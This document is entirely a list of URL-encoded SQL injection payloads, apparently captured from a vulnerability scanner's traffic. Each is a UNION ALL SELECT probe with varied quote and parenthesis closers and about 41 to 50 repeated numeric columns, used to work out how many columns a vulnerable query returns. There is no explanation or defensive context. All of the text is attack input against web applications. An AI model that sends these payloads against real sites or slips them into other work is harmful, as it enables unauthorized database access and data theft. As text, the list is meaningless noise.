-7861%27%29%20UNION%20ALL%20SELECT%206849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%2C6849%23 -9003%27%29%20UNION%20ALL%20SELECT%201093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%2C1093%23 -1175%27%29%20UNION%20ALL%20SELECT%204121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%23 -4419%27%29%20UNION%20ALL%20SELECT%204569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%23 -1618%27%29%20UNION%20ALL%20SELECT%208678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%23 -6887%27%29%20UNION%20ALL%20SELECT%203025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%2C3025%23 -7403%27%29%29%20UNION%20ALL%20SELECT%208864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%2C8864%23 -8532%27%29%29%20UNION%20ALL%20SELECT%205800%2C5800%2C5800%2C5800%2C5800%2C5800%2C5800%2C5800%2C5800%2C5800%2C5800%2C5800%2C5800%2C5800%2C5800%2C5800%2C5800%2C5800%2C5800%2C5800%2C5800%2C5800%2C5800%2C5800%2C5800%2C5800%2C5800%2C5800%2C5800%2C5800%2C5800%2C5800%2C5800%2C5800%2C5800%2C5800%2C5800%2C5800%2C5800%2C5800%2C5800%2C5800%23 -9100%27%29%29%20UNION%20ALL%20SELECT%209165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%23 -6547%27%29%29%20UNION%20ALL%20SELECT%205845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%2C5845%23 -3592%27%29%29%20UNION%20ALL%20SELECT%201605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%2C1605%23 -6031%27%29%29%20UNION%20ALL%20SELECT%206982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%2C6982%23 -3428%27%29%29%20UNION%20ALL%20SELECT%206866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%2C6866%23 -9177%27%29%29%20UNION%20ALL%20SELECT%205215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%23 -7929%27%29%29%20UNION%20ALL%20SELECT%207998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%23 -4597%27%29%29%20UNION%20ALL%20SELECT%201537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%23 -2877%27%29%29%29%20UNION%20ALL%20SELECT%206678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%23 -8689%27%29%29%29%20UNION%20ALL%20SELECT%205968%2C5968%2C5968%2C5968%2C5968%2C5968%2C5968%2C5968%2C5968%2C5968%2C5968%2C5968%2C5968%2C5968%2C5968%2C5968%2C5968%2C5968%2C5968%2C5968%2C5968%2C5968%2C5968%2C5968%2C5968%2C5968%2C5968%2C5968%2C5968%2C5968%2C5968%2C5968%2C5968%2C5968%2C5968%2C5968%2C5968%2C5968%2C5968%2C5968%2C5968%2C5968%23 -3430%27%29%29%29%20UNION%20ALL%20SELECT%207699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%2C7699%23 -6308%27%29%29%29%20UNION%20ALL%20SELECT%201208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%2C1208%23 -4874%27%29%29%29%20UNION%20ALL%20SELECT%202099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%23 -7551%27%29%29%29%20UNION%20ALL%20SELECT%201799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%2C1799%23 -4130%27%29%29%29%20UNION%20ALL%20SELECT%202666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%23 -8540%27%29%29%29%20UNION%20ALL%20SELECT%201159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%23 -1486%27%29%29%29%20UNION%20ALL%20SELECT%208638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%23 -2590%27%29%29%29%20UNION%20ALL%20SELECT%209251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%23 -8752%27%20UNION%20ALL%20SELECT%206860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%2C6860%23 -6737%27%20UNION%20ALL%20SELECT%203491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%23 -5362%27%20UNION%20ALL%20SELECT%204001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%23 -1452%27%20UNION%20ALL%20SELECT%203477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%2C3477%23 -8822%27%20UNION%20ALL%20SELECT%205483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%23 -5337%27%20UNION%20ALL%20SELECT%205321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%2C5321%23 -3927%27%20UNION%20ALL%20SELECT%204799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%2C4799%23 -3420%27%20UNION%20ALL%20SELECT%206110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%23 -1982%27%20UNION%20ALL%20SELECT%209567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%2C9567%23 -9635%27%20UNION%20ALL%20SELECT%204601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601%23 -4023%27%29%20UNION%20ALL%20SELECT%202455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%23 -9581%27%29%20UNION%20ALL%20SELECT%204212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%23 -7250%27%29%20UNION%20ALL%20SELECT%201414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%23 -3275%27%29%20UNION%20ALL%20SELECT%204801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%2C4801%23 -4298%27%29%20UNION%20ALL%20SELECT%206455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%23 -2270%27%29%20UNION%20ALL%20SELECT%206165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%23 -1667%27%29%20UNION%20ALL%20SELECT%202974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%23 -4846%27%29%20UNION%20ALL%20SELECT%202145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%2C2145%23 -5678%27%29%20UNION%20ALL%20SELECT%208258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%23 -5923%27%29%20UNION%20ALL%20SELECT%205856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%23 -8926%27%29%29%20UNION%20ALL%20SELECT%208574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%2C8574%23 -6958%27%29%29%20UNION%20ALL%20SELECT%205316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%2C5316%23 -2683%27%29%29%20UNION%20ALL%20SELECT%208234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%2C8234%23 -5824%27%29%29%20UNION%20ALL%20SELECT%207474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%2C7474%23 -4751%27%29%29%20UNION%20ALL%20SELECT%205381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%2C5381%23 -1871%27%29%29%20UNION%20ALL%20SELECT%208548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%23 -4298%27%29%29%20UNION%20ALL%20SELECT%202316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%2C2316%23 -6525%27%29%29%20UNION%20ALL%20SELECT%207518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%2C7518%23 -1819%27%29%29%20UNION%20ALL%20SELECT%209517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%2C9517%23 -4052%27%29%29%20UNION%20ALL%20SELECT%201496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%2C1496%23 -4358%27%29%29%29%20UNION%20ALL%20SELECT%207543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%2C7543%23 -6987%27%29%29%29%20UNION%20ALL%20SELECT%201201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%2C1201%23 -6625%27%29%29%29%20UNION%20ALL%20SELECT%205172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%2C5172%23 